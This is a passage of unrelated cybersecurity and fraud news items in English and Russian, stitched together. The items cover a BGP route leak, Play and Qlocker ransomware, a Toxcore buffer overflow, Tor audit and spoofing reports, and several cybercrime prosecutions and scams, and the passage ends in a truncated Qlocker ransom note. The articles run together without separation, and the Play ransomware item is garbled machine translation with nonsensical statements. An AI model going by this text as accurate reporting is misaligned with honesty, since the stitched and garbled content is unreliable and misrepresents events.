Further analysis by a BGP expert Anurag Bhatia, has [identified](https://anuragbhatia.com/2021/04/networking/isp-column/large- prefix-hijack-from-vodafone-as55410/) over 20,000 prefixes from global autonomous networks that were impacted as a result of this incident.
A
partial list of over 20k autonomous system numbers (ASNs) impacted from this
BGP leak
Source: Bhatia
[BGP or Border Gateway Protocol](https://www.cloudflare.com/en- gb/learning/security/glossary/what-is-bgp/) is what makes the modern-day internet work.
It is akin to having a "postal system" for the internet that facilitates the redirection of traffic from one (autonomous) system of networks to another.
The internet is a network of networks, and for example, a user based in one country wanted to access a website based in another, there has got to be a system in place that knows what paths to take when redirecting the user across multiple networked systems.
This is similar to a letter being transited through multiple postal branches between its source and destination.
And, that is the purpose of BGP: to direct internet traffic correctly over various paths and systems between the source and destination to make the internet function.
BGP Route leaks
or hijacking explained
Image credit:
[Cloudflare](https://www.cloudflare.com/learning/security/glossary/bgp-
hijacking/#:~:text=BGP%20hijacking%20is%20when%20attackers,%2C%20control%2C%20or%20route%20to.)
But, BGP is fragile, and any disruptions or anomalies in even a few
intermediary systems can have a lasting impact on many.
For the Internet to work, different devices (autonomous systems) advertise the IP prefixes they manage and the traffic they are able to route. However, this is largely a trust-based system with the assumption that every device is telling the truth.
Given the massive interconnected nature of the Internet, it is hard to enforce honesty on every single device present on the network.
BGP route hijacking occurs when a malicious entity manages to "falsely advertise" to other routers that they own a specific set of IP addresses when they don't. When this happens, chaos occurs.
This route confusion would create a lot of trouble on the Internet and lead to delays, traffic congestion, or total outages.
But, BGP route leaks are similar to BGP route hijacking, except the latter more specifically refers to instances of malicious activity taking place.
Whereas, route leaks can be, more likely than not, accidental.
In either case of a BGP route leak or BGP hijacking, an Autonomous System (AS) announces that it knows "how" or "where" to direct the traffic meant for certain destinations (ASes) that in actuality it does not know.
This can lead to the user being taken over an internet route that will offer suboptimal performance or outright cause disruptions and potentially serve as a front for eavesdropping or traffic analysis activities, in cases of malicious hijacking.
For example, last year, as reported by BleepingComputer, IBM's global outage was caused because of an erroneous BGP routing configuration.
Prior to this, we had seen a significant case of BGP hijacking in 2008, when YouTube had gone [offline](https://www.cnet.com/news/how-pakistan-knocked- youtube-offline-and-how-to-make-sure-it-never-happens-again/) for its global audience due to some of its traffic getting redirected through Pakistani servers.
Over the next few years, we have reported similar incidents.
Взломщики заставили встряхнуться американские города и посетить компании.
Группировка Play, ответственная за ряд разрушительных атак на крупные города
Америки, осуществила более 300 успешных взломов в июне 2022 года. Об этом
сообщают ФБР, агентства кибербезопасности в США и Австралии в совместном
предупреждении о деятельности группы Play В этом году группа «посетила» города
Окленд, Лоуэлл и Даллас, которые в течение нескольких дней боролись с
зашифрованными устройствами и украденными данными граждан. Властям города
Окленд даже пришлось объявить в городе крайнее положение. Госорганы Швейцарии
также подверглись огромным данным во время атаки на одного из своих ИТ-
провайдеров. По данным агентств, группа атаковала широкий круг бизнес-отраслей
и критической занятости в Северной и Южной Америке, а также в Европе за
последние полтора года. ФБР известно примерно о 300 жертвах по состоянию на
октябрь 2023 года. В Австралии первое происшествие с участием группы Play было
замечено в последнюю очередь, последнее - в скале. Группа действует более
осторожно, чем другие киберпреступники. В большинстве случаев Play не включает
свои требования в записку или выкуп, а вместо этого просит жертву связаться с
вымогателями по электронной почте, заканчивая сообщением @gmx[.]de. Учитывая
заявления на сайте группы об утечке данных, специалисты отметили, что Play
предположительно является закрытым следствием, созданным для того, чтобы
«гарантировать тайну сделок». Вымогатели используют модель двойного
вымогательства, шифруя системы после кражи данных. Типично группа использует
украденные учётные данные и общедоступные приложения, нацеливаясь на
уязвимости в популярных продуктах, таких как уязвимости FortiOS CVE-2018-13379
и CVE-2020-12812, а также уязвимости ProxyNotShell в инструментах Microsoft.
Злоумышленники используют различные инструменты для кражи информации, а также
для подключения и отключения антивирусного ПО. После разделения
скомпрометированных данных на меньшие части и переноса их в управляемые
хакерами-аккаунты, группа обычно добавляет расширение .play к именным файлам.
Выкупы происходят в криптовалюте на адресах кошельков, предоставленных
взломщиками. Если жертва отказывается от выкупа, злоумышленники угрожают
опубликовать украденные данные на своем сайте и уничтожить сеть в Tor Когда
группа Play впервые появилась в середине 2022 года, она нацелилась на
представителей Латинской Америки. Недавно группировка привлекла внимание из-за
решающей атаки на город Окленд, который вернулся на несколько недель на
восстановление после инцидента. Облачный провайдер Rackspace Technology Inc.
вернул $10,8 млн. по устранению последствий масштабной кибератаки Играть.
В марте Play опубликовала 10 ГБ данных правительства Окленды после отказа
власти города выкупить британские власти. Утечка отдельных конфиденциальных
данных, переданных из полицейского управления города, номеров водительских
прав, номеров официального страхования и даже информации о выборных
представителях города.
В Toxcore, эталонной реализации P2P-протокола обмена сообщениями Tox, выявлена [уязвимость](https://blog.tox.chat/2021/12/stack-based-buffer-overflow- vulnerability-in-udp-packet-handling-in-toxcore-cve-2021-44847/) ([CVE-2021-44847](https://security- tracker.debian.org/tracker/CVE-2021-44847)), которая потенциально позволяет инициировать выполнение кода при обработке специально оформленного UDP-пакета. Уязвимости подвержены все пользователи приложений на базе Toxcore, в которых не отключён транспорт UDP. Для атаки достаточно отправить UDP-пакет, зная IP- адрес, сетевой порт и открытый DHT-ключ жертвы (данные сведения доступны публично в DHT, т.е. атака могла быть совершена на любого пользователя или узел DHT).
Проблема проявлялась в выпусках toxcore с 0.1.9 по 0.2.12 и устранена в версии 0.2.13. Из клиентских приложений обновление с устранением уязвимости пока выпустил только проект qTox. В качестве обходного пути защиты можно отключить использование UDP, оставив поддержку TCP.
Уязвимость вызвана переполнением буфера в функции handle_request(), возникающего из-за некорректного расчёта размера данных в сетевом пакете. В частности, длина зашифрованных данных определялась в макросе CRYPTO_SIZE, определённом как "1 + CRYPTO_PUBLIC_KEY_SIZE * 2 + CRYPTO_NONCE_SIZE", который в дальнейшем использовался в операции вычитания "length - CRYPTO_SIZE". Из-за отсутствия скобок в макросе вместо вычитания суммы всех значений выполнялось вычитание 1 и сложение остальных частей. Например, вместо "length - (1 + 32 * 2 + 24)" размер буфера рассчитывался как "length - 1 + 32 * 2 + 24", что приводило к перезаписи данных в стеке, находящихся за границей буфера.
Чиланзарский районный суд по уголовным делам Ташкента вынес приговор в отношение 24-летнего студента Термезского государственного университета за продажу Notcoin. «Газета.uz» изучила решение суда.
Согласно материалам дела, ГУВД Ташкента 1 июня получило жалобу и провело доследственную проверку. Установлено, что студент И. Н. использовал свой телефон и пластиковую карту для незаконной деятельности с криптоактивами.
На судебном заседании молодой человек признал себя виновным в совершении правонарушения и заявил, что собрал «криптоактив в Telegram» и продал Notcoin за 800 тысяч сумов (~$62,41). Он попросил суд смягчить наказание, заявив, что не знал о незаконности этого действия. Студент также указал, что является единственным кормильцем в семье.
Суд назначил молодому человеку 10 суток административного ареста по части 1 статьи 155−4 Кодекса об административной ответственности (незаконное приобретение, сбыт или обмен криптоактивов — влечёт административный арест до 15 суток или наложение штрафа от 20 до 30 БРВ). Эта ответственность была введена в начале года.
Суд также постановил уничтожить принадлежащие студенту телефон Galaxy A30 и банковскую пластиковую карту.
Напомним, с января 2024 года в Узбекистане введены штрафы и сроки за нелегальные операции с криптовалютами.
Также в стране действует обязательная регистрация для провайдеров криптовалютных услуг. С августа 2022 года власти блокируют нелицензированные торговые платформы.
Злоумышленники собрали личные данные пользователей соцсетей, а потом шантажировали их.
14 марта полиция США арестовала 19-летнего подростка, подозреваемого в принадлежности к преступной группе «ViLE», по обвинению во взломе учетной записи полицейского.
Прокуратура округа США заявила , что Сагар Стивен Сингх (19 лет) вместе со своим подельником Николасом Сераоло (25 лет) не только шантажировали жертв, угрожая разместить их личные данные в сети, но и подавали «экстренные запросы» (экстренный запрос) соцсетям, запрашивая информацию о пользователях. Названия соцсетей не разглашаются. Преступники обманывали представителей соцсетей, выпрашивая информацию о пользователях под предлогом, что «гибель этих людей неизбежна».
В рассматриваемой базе данных есть «конфиденциальные записи об изъятии наркотиков и валюты», а также «отчеты правоохранительных органов». Это означает, что, возможно, это база данных Управления по борьбе с наркотиками (DEA). Согласно судебным документам, преступники ищут показания под присягой в Интернете (аффидевит) и распространяют их среди других злоумышленников, публикуя на форумах.
Сагар Стивен Сингх предстал перед федеральным судом вчера, а 25-летний Сераоло все еще находится на свободе. Если суд признает Сераоло виновным, то он может получить до 20 лет за сговор с целью совершения мошенничества с использованием электронных средств связи, а вместе соучастники могут быть приговорены к 5 годам лишения свободы за сговор с целью совершения компьютерных вторжений.
По данным прокуратуры, Сингх и Сераоло использовали учетные данные полицейского для доступа к «закрытому, защищенному паролем веб-порталу», поддерживаемому федеральным правоохранительным органом США. На портале происходит обмен информацией из правительственных баз данных с правоохранительными органами штатов и местных органов власти.
Прокуратура утверждает, что преступники получили доступ к порталу с помощью дескриптора «Weep», а затем, используя личные данные из базы, шантажировали жертв. ViLE описывается как «группа киберпреступников, специализирующаяся на получении личной данных жертв, которая затем используется для преследования, угроз или вымогательства – практика, известная как доксинг.
Экстренные запросы – запросы, которые подают правительства всего мира социальным сетям с целью узнать необходимую информацию об учетной записи в ходе расследования или уголовного преследования пользователя. Например, за первую половину 2022 года различные спецслужбы запросили у Meta* данные о 237 000 пользователях. Meta* выполнила более 75% таких запросов. Каждый запрос тщательно проверяется юристами, и компания может отклонить запрос или потребовать большей конкретики, если запрос охватывает слишком широкий круг лиц или имеет расплывчатую формулировку.
source: justice[.]gov/usao-edny/pr/two-men-charged-breaching-federal-law- enforcement-database-and-posing-police-officers
Житель Айдахо признался во взломе медицинских клиник и полицейского участка с последующим вымогательством.
Роберт Пёрбек, известный под псевдонимами Lifelock и Studmaster, арестован по обвинениям в киберпреступлениях, совершённых в период с 2017 по 2018 год. Приобретая украденные учётные данные в даркнете, злоумышленник получил доступ к персональным данным более 130 000 человек.
Пёрбек взломал системы медицинской клиники в Гриффине, штат Джорджия, и полицейского управления в соседнем городе Ньюман, а также атаковал ещё минимум 17 объектов. В числе украденных данных оказались полицейские доклады и документы, содержащие личную информацию свыше 14 000 человек.
Прокуратура утверждает, что Пёрбек также похитил информацию из медицинской клиники в Локуст Гров, Джорджия, и у ортодонта из Флориды, пытаясь шантажировать последнего, угрожая продать личные данные несовершеннолетнего ребёнка ортодонта и отправляя угрозы пациентам по электронной почте и в текстовых сообщениях.
Перед арестом Пёрбек, используя псевдоним Lifelock, [общался](https://databreaches.net/mi-holland-eye-surgery-laser-center- notifies-42200-patients-about-2016-hack/) с администрацией сайта DataBreaches.net по поводу взлома центра глазной хирургии в Голланде, штат Мичиган. Пёрбек требовал выкуп у клиники, и когда требование осталось без ответа, а информация о взломе так и не была опубликована, Lifelock попросил администратора сайта уведомить жителей Голланда о произошедшем. В итоге клиника сообщила о взломе, спустя 2 года после инцидента.
Пёрбек будет приговорён в июне, а по условиям сделки о признании вины выплатит $1 миллион в качестве компенсации жертвам.
• Source: https://www.justice[.]gov/usao-ndga...puters-city-newnan-and- griffin-medical-clinic
В суд города Днепр обратился представитель Приватбанка, с иском о взыскании с клиента задолженности за использование кредитного лимита. Общая сумма долга составила более 56 тысяч гривен, из которых 12 тысяч – это проценты за просроченное погашение. Пикантность ситуации заключалась в том, что согласно показаниям ответчика, эти кредитные средства, вместе со всей зарплатой были похищены у него неизвестными мошенниками.
Мужчина, который 20 лет проработал в государственном Фонде социального страхования, стал клиентом Приватбанка из необходимости открыть карту под зарплатный проект. Однако, согласно стандартной практике Приватбанка, ему навязали кредитную карту, которой он пользовался очень редко и всегда вовремя перекрывал.
Однажды он обнаружил, что его мобильный телефон перестал видеть сеть. Переставив sim-карту в другое устройство, мужчина обнаружил, что проблема именно в ней и обратился за помощью к сотрудникам сервисного центра «Водафон». Те предположили, что она перестала работать по причине старости и произвели замену за 25 гривен.
Заменив карту, сотрудники СЦ пообещали, что она заработает через час, однако даже через 4 часа этого не произошло. Тогда мужчина обратился за помощью в другой салон «Водафона». Там сказали, что для данного номера был установлен запрет на замену sim-карты и сняли его.
Заподозрив неладное, мужчина не стал ждать, пока номер заработает и поспешил к ближайшему банкомату, чтобы проверить баланс. Но там его уже ждал неприятный сюрприз: на зарплатной карте, где еще утром было более 10 тысяч гривен, к вечеру почти ничего не осталось.
Когда sim-карта ожила, потерпевший позвонил на горячую линию 3700, чтобы оставить заявление о том, что стал жертвой мошенников и заблокировать счета. В ответ, оператор сообщил, что деньги пропали не только с зарплатной, но и с кредитной карты, причем, значительно большая сумма – 44,4 тыс. грн.
Заказав в банке выписку транзакций по счетам, потерпевший выяснил, что деньги были переведены через онлайн-банкинг на ряд неизвестных карточек, а также использовались для покупки двух айфонов в интернет-магазине Comfy.
Мужчина направил в Приватбанк заявление с объяснением ситуации и просьбой вернуть деньги, но получил отказ. Тогда он попросил хотя бы перестать начислять проценты за использование кредитного лимита, до окончания досудебного расследования правоохранительными органами по его делу. Но и тут его ждал отказ - позиция банка была непреклонной: должник должен платить.
Потерпевший объяснил представителям банка, что выплата внезапно появившейся задолженности является для него непосильной, поскольку он работает на государственной службе. Тогда менеджеры банка предложили его 69-летней матери, получающей 2,3 тыс. грн пенсии на карту Приватбанка, регулярно отчислять эти деньги, в счет долга.
В отчаянии мужчина начал рассылать обращения в Национальный Банк Украины, Верховную Раду и даже Президенту. Ответила только Уполномоченная ВР по правам человека.
Благодаря работе, проделанной следователями, удалось установить абонентский номер, с которого мошенники заказали перевыпуск sim-карты, адрес отделения магазина Comfy, где выдавались купленные мошенниками смартфоны, а также номер телефона, указанный ими при оформлении покупки. Следствие по этому делу все еще продолжается.
Внимательно изучив все приведенные ответчиком обстоятельства дела, суд вынес решение, что для принудительного взыскания задолженности с потерпевшего от мошеннических действий, у Приватбанка нет никаких оснований. Очень жаль, что юристы и топ-менеджеры банка не понимают этого сами. Судебные расходы по данному делу надлежит покрыть истцу.
В федеральной прокуратуре Северного округ штата Огайо сообщили, что 4 июня в суде Кливленда магистрат Уильям Бауман предъявил обвинение 55-летней гражданке Латвии российского происхождения Алле Витте, которая значилась в Интернете под ником «MAX».
На 60 страницах обвинительного заключения по делу №1:20-Cr. 440 утверждается, что подсудимая с сообщниками занимались компьютерным мошенничеством, кражами личных данных и отмыванием денег. В пресс-релизе прокуратуры отмечено, что обвинения грозят Алле Витте лишением свободы сроком в общей сложности до 85 лет, но поскольку приговоры у нас обычно не складываются, а меньшие поглощаются большим, можно говорить о 30 годах тюрьмы, хотя до решения суда Алла Витте, она же «Макс», считается невиновной. Ордер на ее арест был выдан 14 августа 2020 года, арестовали ее 6 февраля 2021 года в Майами, где она оказалась не то проездом, а точнее пролётом, не то по делам, не то на отдыхе.
Через 6 дней после ареста федеральный судья-магистрат Южного округа штата Майами Алиша Отазо-Рейес приказала, чтобы «федеральный маршал доставил обвиняемую вместе с копией этого приказа в округ, где предъявлено обвинение и передал ее маршалу этого округа. Так Алла Витте попала в Огайо, где содержится под стражей и числится за федеральным бюро тюрем США под №21183-104, но поскольку в штате Огайо две федеральные тюрьмы и обе мужские, ее держат в тюрьме города или штата. Вместе с ней по делу проходят 6 сообщников, имена которых в обнародованном тексте обвинения закрашены, но сообщается, что пятеро проживающие в России россияне, один живет в Украине и украинец, а сама Алла Витте тоже гражданка России и жила там, но в период совершения указанных в деле преступлений проживала в Суринаме, небольшом государстве на северо- востоке Южной Америки.
Обвинение датировано 13 августа 2020 года, и позже министерство юстиции внесло поправку, что Алла Витте родилась и выросла в России, но затем переехала в Латвию, где получила гражданство, а двойного гражданства с Россией эта страна не признает. Судья Бауман постановил держать ее под стражей без права освобождения под залог, как обычно бывает с арестованными в США иностранцами. Дело Аллы Витте поручено вести 73-летнему чернокожему судье Соломону Оливеру, которого назначил президент Билл Клинтон, обвинение представляют помощники федерального прокурора Северного округа Огайо Дэниел Ридл и Данкан Браун, а защиту назначенный судом кливлендский адвокат Джеффри Лазарус. Слушания проходят при русском переводчике.
Соединенного Королевства (Великобритания), Австралии, Бельгии, Канады, Германии, Индии, Италии, Мексики, Испании и России с помощью вредоносной программы (malware) Trickbot. Следует отметить, что на первых 5 страницах обвинения в главе «Термины» (Definitions) разъясняются 25 понятий из словаря «айтишников», без чего в этом деле сломит ногу не просто черт, а и сам Сатана. Помимо «злыдней»-вирусов «Trojan» и «Ransomware», там объяснено, кто такой «Mule» или «Money Mule», что такое ‘’Phishing» и «Crypting», но банкуют в этом глоссарии слова ‘’bot» и «botnet». Как мне уже пришлось пояснять в связи с делом москвича-«айтишника Александра Жукова, которого 28 мая признали виновным в бруклинском федеральном суде, «бот» (сокращение слова «robot») значит зараженный вирусом компьютер, которым можно управлять дистанционно без ведома владельца, а «botnet» – сеть таких «ботов».
Как утверждает прокуратура, Алла Витте была членом преступной организации Trickbot Group, которая действовала на территории России, Беларуси, Украины и Суринама, в столице которого, городе Парамарибо, жила Алла, она же «Макс». В обвинении их жертвы перечислены поимённо, а в пресс-релизе прокуратуры вскользь отмечено, что, помимо частных лиц и восьми банков, в компьютеры которых вторгались российские кибермошенники, это были «больницы, школы, общественные учреждения и структуры власти на территории Северного округа штата Огайо и других районов США». Как заявила, комментируя обвинение, замминистра юстиции Лиза Монако, программа-вирус Trickbot «заразила миллионы компьютеров по всему миру, и через нее [мошенники] получали банковские данные и посылали требования выкупа».
Временный прокурор Северного федерального округа Огайо Бриджет Бреннан в пресс-релизе добавила, что этот «бот» был создан для того, чтобы воровать личную и финансовую информацию у миллионов людей по всему миру, тем самым нанося значительный финансовый урон и причиняя значительный ущерб важной инфраструктуре в Соединенных Штатах и за границей. Замминистра и прокурор, как принято в таких случаях, подчеркнули, что наша система права таких безобразий не терпела, не терпит и не терпеть не будет, а начальник кливлендского отделения ФБР Эрик Смит заверил, что борьба с компьютерными вторжениями и вредоносными программами требует значительного времени, опыта и следственных усилий, но ФБР гарантирует, что такие хакеры будут привлечены к ответу, и неважно, где они живут и насколько безымянными себя считают. Это был камушек в огород Аллы Витте, родившейся в России, получившей гражданство Латвии и жившей в Южной Америке под интернет-псевдонимом «Макс».
По мнению прокуратуры, роль Витте в Trickbot Group сводилась к разработке вредоносной программы Malware; руководству созданием кода, регулирующего доступ пользователей Malware; контролированию и разработке вымогательской программы Ransomware, получая выкуп у жертв этой программы; а также к созданию инструментов и протоколов хранения и обработки личных данных, похищенных у жертва вируса Trickbot. Конкретно обвиняемые а) заражали компьютеры своих жертв вирусом Trickbot, чтобы завладеть данными входа на их банковские счета; б) получали и хранили другие личные данные, включая номера кредитных карт, электронные сообщения, пароли, даты рождения, номера карточек социального обеспечения и адреса; в) заражали другие компьютеры, связанные с компьютером их жертвы; г) с помощью полученных данных без разрешения проникали на банковские счета своих жертв; д) похищали с этих счетов деньги и отмывали их на контролируемых обвиняемыми и их сообщниками счетах банков в США и за рубежом; е) вводили в компьютеры потерпевших программы выкупа.
В обвинении отмечено, что 11ноября 2015 года участники Trickbot Group получили данные сервера, которым пользовались операторы вредоносной программы Dyre. Примерно через неделю российские правоохранители арестовали этих операторов и других, кто с помощью Dyre создавал новые вредоносные программы, а 4 декабря 2015 года Trickbot Group начала связываться с программистами и серверами освободившихся площадок для установки там своих программ в США, Канаде, Англии, Италии, Голландии, Литве, России и других странах. 7 декабря 2015 года Trickbot Group обсудила с СС8 необходимость перестройки инфраструктуры сети в связи с крахом группы Dyre, и к марту 2016 года обвиняемые поместили на русскоязычном сайте трудоустройства объявления о вакансиях программистов, которым для работы в Trickbot Group необходимо пройти тесты кодирования информации. Читая все это, приходишь к выводу, что киберпреступники, конечно, на несколько голов выше воров старой формации, но разоблачать их куда легче, так как все переговоры и сообщения фиксируются и запоминаются в облаках Сети.
Конкретно про Аллу Витте, она же «Макс», в обвинении утверждается, что с октября 2019 года и по день составления обвинения, то есть 13 августа 2020 года, она обеспечивала Trickbot Group кодом для размещения модуля программы требований выкупа Ransomware. Как было подтверждено недавними случаями ввода аналогичного вируса другими хакерами в компьютеры компании-владельца нефтепровода и Colonial Pipeline и крупнейшей в мире фирмы-изготовителя мясных продуктов JBS, зараженный вирусом Ransomware компьютер перестает работать и на мониторе появляется предупреждение, что сайт блокирован и через какое-то время информация на нем исчезнет, если не будут выполнены условия кибервымогателей. В данном случае на мониторе компьютера возникала надпись: «Ваш компьютер заражен! Ваши документы, фото, базы данных и другие важные файлы зашифрованы. Чтобы расшифровать их, вам необходимо купить нашу специальную программу». Код, которым заведовала Алла Витте, располагал панелью управления программой Ransomware, включая «объекты», «боты» и «пользователей» этой программы, а также автоматический удваиватель суммы выкупа, если «объект» на платил Trickbot Group в назначенный ему срок. Выкуп предлагалось платить криптовалютой.
• Source: justice[.]gov/opa/pr/latvian-national-charged-alleged-role- transnational-cybercrime-organization
• Source: justice[.]gov/opa/press-release/file/1401766/download
Бортпроводница из Дубая португальского происхождения потеряла все свои сбережения в размере 200 тысяч дирхамов в результате телефонного мошенничества. В течение 24 минут деньги, которые она копила более двух лет, мечтая уволиться и вернуться на родину, были переведены неизвестными лицами на три разных счета.
Женщина проживает в ОАЭ уже более четырех лет, и постоянно слышит информацию о случаях телефонного мошенничества. Благодаря этому, она никогда не отвечала на звонки или сообщения с незнакомых номеров.
В тот злополучный день, пострадавшая вернулась домой после долгого ночного перелета, и была сильно вымотана. "Я ждала звонка от друга, который приехал из Португалии, - сказала она, - Это единственная причина, по которой я ответила на звонок с незнакомого номера".
Звонок начался с того, что мошенники сообщили женщине, что она выиграла приз в размере 150 тысяч дирхамов от банка Emirates NBD в сотрудничестве с крупным обменным пунктом в ОАЭ. Она была в этом обменном пункте накануне. Преступники предложили обновить банковское приложение, установленное на телефоне, до последней версии ENBD X, сказав, что это необходимо для получения приза. Во время этого процесса ее обманом заставили раскрыть свои данные и пароль для входа в приложение.
"Сейчас, когда я говорю об этом вслух, то не могу поверить, насколько глупой я была, - сказала она, - Но в тот момент меня словно загипнотизировали". Получив данные для входа в систему, мошенники в течение следующих 15 минут отвлекали пострадавшую, называя ей номера телефонов и прося записать их. "Оглядываясь назад, я понимаю, что они отвлекали меня, чтобы я не проверила свой телефон и не увидела банковские уведомления", - говорит она.
В скором времени ее счет был опустошен, а деньги отправлены на три разных счета. Хотя у женщины нет особой надежды вернуть свои деньги, она хочет, чтобы ее история стала уроком для других. "Мошенники становятся все более технологичными. Остерегайтесь и не доверяйте никому", - добавила пострадавшая.
В последние дни операторы узлов сети Tor начали массово получать уведомления о подозрительной активности, связанной с предполагаемым злоупотреблением их IP-адресами. Уведомления касаются многочисленных неудачных попыток входа по протоколу SSH , которые, как сообщается, исходят якобы от их узлов и, возможно, указывают на попытки брутфорс-атак.
Следует отметить, что узлы Tor, как правило, служат для передачи анонимного трафика между исходными и конечными точками внутри сети и не предназначены для инициирования прямых подключений к внешним хостам по SSH, особенно с целью проведения брутфорс-атак. Анализ исследователя под псевдонимом «delroth» показал, что в реальности большая часть узлов Tor не генерировала SSH-трафик , что указывало на фальсификацию.
Было установлено, что злоумышленники подделывают IP-адреса узлов Tor , используя их в рамках масштабной брутфорс-атаки против honeypots (ловушек для отслеживания хакерских атак) и систем обнаружения вторжений (IDS), которые настроены на автоматическую отправку жалоб при обнаружении подозрительной активности. В результате подделанные сообщения формируют поток ложных уведомлений о злоупотреблениях , что создаёт ложное впечатление, будто узлы Tor участвуют в нелегальных действиях.
Эта ситуация приводит к тому, что хосты, с которых зафиксированы многочисленные неудачные попытки подключения , попадают в чёрные списки и приобретают «плохую репутацию». IP-адреса таких узлов начинают ассоциироваться с подозрительной активностью, и они получают значительное количество уведомлений о нарушениях. В ответ многие интернет-провайдеры блокируют или отключают доступ к таким узлам , зачастую без возможности апелляции для их владельцев. Это особенно критично для операторов сети Tor, поскольку каждый отключённый узел ослабляет инфраструктуру , на которой держится анонимность пользователей Tor.
Таким образом, атака направлена на подрыв работы инфраструктуры сети Tor : злоумышленники создают лавину жалоб, перегружая системы безопасности и увеличивая количество ложных уведомлений о нарушениях. На данный момент вредоносная активность остаётся умеренной , однако атакующие остаются неизвестными , что вызывает серьёзные опасения среди пользователей и операторов Tor.
В настоящее время операторов узлов Tor призывают активно подавать апелляции , чтобы их IP-адреса не блокировались, а также наращивать мощность сети, создавая новые узлы взамен потерянных. Интернет-провайдеров просят более тщательно проверять жалобы на подозрительную активность и учитывать, что злоумышленники могут умышленно подделывать данные, чтобы избежать ложных блокировок и не нарушать работу сети Tor.
Разработчики анонимной сети Tor [опубликовали](https://blog.torproject.org/security-audit-report-tor-browser- ooni/) результаты аудита браузера Tor Browser и развиваемых проектом инструментариев OONI Probe, rdsys, BridgeDB и [Conjure](https://gitlab.torproject.org/tpo/anti-censorship/pluggable- transports/conjure), применяемых для обхода цензурирования. Аудит проводился компанией Cure53 с ноября 2022 года по апрель 2023 года.
В ходе проверки были [выявлены](https://blog.torproject.org/security-audit- report-tor-browser-ooni/TTP-01-report.pdf) 9 уязвимостей, две из которые отнесены к категории опасных, одной присвоен средний уровень опасности, а 6 отнесены к проблемам с незначительным уровнем опасности. Также в кодовой базе было найдено 10 проблем, отнесённых к категории не связанных с безопасностью недоработок. В целом код проекта Tor отмечен как соответствующий практикам безопасного программирования.
Первая опасная уязвимость присутствовала в бэкенде распределённой системы rdsys, обеспечивающей доставку цензурируемым пользователям ресурсов, таких как списки прокси и ссылки для загрузки. Уязвимость вызвана отсутствием аутентификации при обращении к обработчику регистрации ресурсов и позволяла атакующему зарегистрировать собственный вредоносный ресурс для доставки пользователям. Эксплуатация сводится к отправке HTTP-запроса к обработчику rdsys.
Вторая опасная уязвимость найдена в Tor Browser и была вызвана отсутствием
проверки цифровой подписи при получении списка мостовых узлов через rdsys и
BridgeDB. Так как список загружается в браузер на стадии до подключения к
анонимной сети Tor, отсутствие проверки по криптографической цифровой подписи
позволяло атакующему подменить содержимое списка, например, через перехват
соединения или взлом сервера, через который распространяется список. В случае
успешной атаки злоумышленник мог организовать подключение пользователей через
собственный скомпрометированный мостовой узел.
Уязвимость средней опасности присутствовала в подсистеме rdsys в скрипте развёртывания сборок и позволяла атакующему поднять свои привилегии с пользователя nobody до пользователя rdsys, при наличии доступа к серверу и возможности записи в каталог с временными файлами. Эксплуатация уязвимости сводится к замене размещаемого в каталоге /tmp исполняемого файла. Получение прав пользователя rdsys позволяет атакующему внести изменения в запускаемые через rdsys исполняемые файлы.
Уязвимости низкой степени опасности в основном были связаны с использованием устаревших зависимостей, в которых присутствовали известные уязвимости, или с возможностью совершения отказа в обслуживании. Из незначительных уязвимостей в Tor Browser отмечается возможность обхода запрета выполнения JavaScript при выставлении высшего уровня защиты, отсутствие ограничений по загрузке файлов и потенциальная утечка информации через пользовательскую домашнюю страницу, позволяющая отслеживать пользователей между перезапуcками.
В настоящее время все уязвимости устранены, среди прочего реализована аутентификация для всех обработчиков rdsys и добавлена проверка загружаемых в Tor Browser списков по цифровой подписи.
Дополнительно можно отметить [выпуск](https://blog.torproject.org/new-release- tor-browser-1301/) браузера Tor Browser 13.0.1. Выпуск синхронизирован с кодовой базой Firefox 115.4.0 ESR, в которой устранено [19 уязвимостей](https://www.mozilla.org/en- US/security/advisories/mfsa2023-46/) (13 признаны опасными). В версию Tor Browser 13.0.1 для Android перенесены исправления уязвимостей из ветки Firefox 119.
A massive ransomware campaign targeting QNAP devices worldwide is underway,
and users are finding their files now stored in password-protected 7zip
archives.
The ransomware is called Qlocker and began targeting QNAP devices on April
19th, 2021. Since then, there has been an enormous amount of activity in our
support forum, and ID-Ransomware has seen a surge of submissions from victims.
According to reports from victims in a BleepingComputer Qlocker support topic,
the attackers use 7-zip to move files on QNAP devices into password-protected
archives. While the files are being locked, the QNAP Resource Monitor will
display numerous '7z' processes which are the 7zip command-line executable.
7zip
seen running in the QNAP Resource Monitor
When the ransomware has finished, the QNAP device's files will be stored in
password-protected 7-zip archives ending with the .7z extension. To
extract these archives, victims will need to enter a password known only to
the attacker.
Password-protected
7zip archive
After QNAP devices are encrypted, users are left with a !!!READ_ME.txt
ransom note that includes a unique client key that the victims need to enter
to log into the ransomware's Tor payment site.
Qlocker ransom note
From the Qlocker ransom notes seen by BleepingComputer, all victims are told
to pay 0.01 Bitcoins, which is approximately $557.74, to get a password for
their archived files.
Qlocker Tor payment
site
Update 4/22/21 12:44 AM EST: A weakness may have been found that could
potentially allow victims to recover their files for free. We are still
investigating this and will post an update around 10 AM EST, or possibly
earlier..
Update 4/22/21 09:15 AM EST: Early this morning, BleepingComputer was contacted by Jack Cable about bug he discovered in the Qlocker Tor site that allowed users to recover their 7zip passwords for free.
Using this bug, victims could take a Bitcoin transaction ID from a person who had already paid the ransom and slightly alter it. When they submitted the altered transaction ID into the Qlocker Tor site, it accepted it as payment and displayed the victim's 7zip password.
Last night, Cable had been private helping people recover their passwords and arrangements were being made with Emsisoft to create a help system for victims to recover files.
Sadly, an hour after we learned of the bug, the ransomware operators caught on and fixed it.
Update: it looks like this may have been fixed by the ransomware operators, unfortunately. I apologize if I was not able to get to yours before it was fixed. In total decrypted around 50 keys worth $27k.
— Jack Cable (@jackhcable) April 22, 2021Click to expand...
At this point, there is no way to recover the files without a password, which can no longer be retrieved for free.
Recently QNAP resolved critical vulnerabilities that could allow a remote actor to gain full access to a device and execute ransomware.
QNAP fixed these two vulnerabilities on April 16th with the following descriptions:
More information about these vulnerabilities can be found in a blog post by the SAM Seamless Network research team who disclosed the bugs to QNAP.
QNAP told BleepingComputer that they believe Qlocker exploits the CVE-2020-36195 vulnerability to execute the ransomware on vulnerable devices.
Due to this, it is strongly recommended to update QTS, Multimedia Console, and the Media Streaming Add-on to the latest versions.
While this will not recover your files, it will protect you from future attacks using this vulnerability.
!!!READ_ME.txt
!!! All your files have been encrypted !!!
All your files were encrypted using a private and unique key generated for the computer. This key is stored in our server and the only way to receive your key and decrypt your files is making a Bitcoin payment.
To purchase your key and decrypt your files, please follow these steps:
1. Dowload the Tor Browser at "https://www.torproject.org/". If you need help, please Google for "access onion page".
